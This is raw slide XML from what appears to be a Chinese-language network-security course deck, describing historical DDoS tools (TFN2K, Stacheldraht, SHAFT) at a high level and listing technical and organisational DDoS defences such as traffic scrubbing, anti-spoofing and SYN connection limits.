              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无法发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>针对脆弱路由器的攻击手段。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更强的加密功能，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>加密。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>d.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随机选择目的端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TFN2K</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186</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031292173"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的特点，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间的通信加密，增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>端的自动更新功能，即能够自动更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机列表。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Stacheldraht</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187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1663421455"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:t>独立发展起来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击方法，特点：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在攻击过程中，受控主机之间可以交换对分布端的控制和端口，这使得入侵检测工具难以奏效。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用了“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ticket”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>机制进行攻击，使其攻击命令有一定秘密性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>采用了独特的包统计方法使其攻击得以顺利完成。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SHAFT </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188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2936937704"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本地防御</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分布式集群</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>负载均衡：在每个节点服务器配置多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址，每个节点能承受不低于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击，如一个节点受攻击无法提供服务，系统自动切换另一个节点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>异常流量清洗：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>硬件防火墙清洗异常流量，通过数据包规则、数据流指纹检测、及数据包内容定制过滤判断流量是否正常，单台负载每秒可防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>800-927</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>万个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高防智能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析：智能根据用户的上网路线将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析请求解析到用户所属网络的服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宕机检测，随时将瘫痪服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>智能更换成正常服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>云清洗服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在云端实时检测和缓解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击可以确保恶意流量远离您的网络，同时允许合法用户继续使用您的网站和服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术方面 </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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3554657236"/>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a:t>入侵和攻击的范畴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在局域网上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本地</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>离线</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90114" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6324600"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>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DC13B013-827A-43EF-94CE-B692406FEE6A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1642135980"/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到目前为止，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击防御比较困难</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议漏洞，攻击特征不明显，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>全连接或半连接攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流量汇聚，近身防御无效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最有效的防御：源头治理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络出口禁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无驱动力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>各司其职协调防御（建立纵深体系）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统或网络管理员</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>管理员</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>骨干网络运营商</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13314" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的防范</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理方面 </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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3773033425"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从主机与网络设备两个角度去考虑。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）主机设置，几乎所有主机都应防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭不必要的服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限制同时打开的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>半连接数目</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缩短</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>半连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>time out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>及时更新系统补丁 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统或网络管理员</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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870290438"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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zh-CN" altLang="en-US"/>
              <a:t>系统或网络管理员</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）网络设备上的设置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
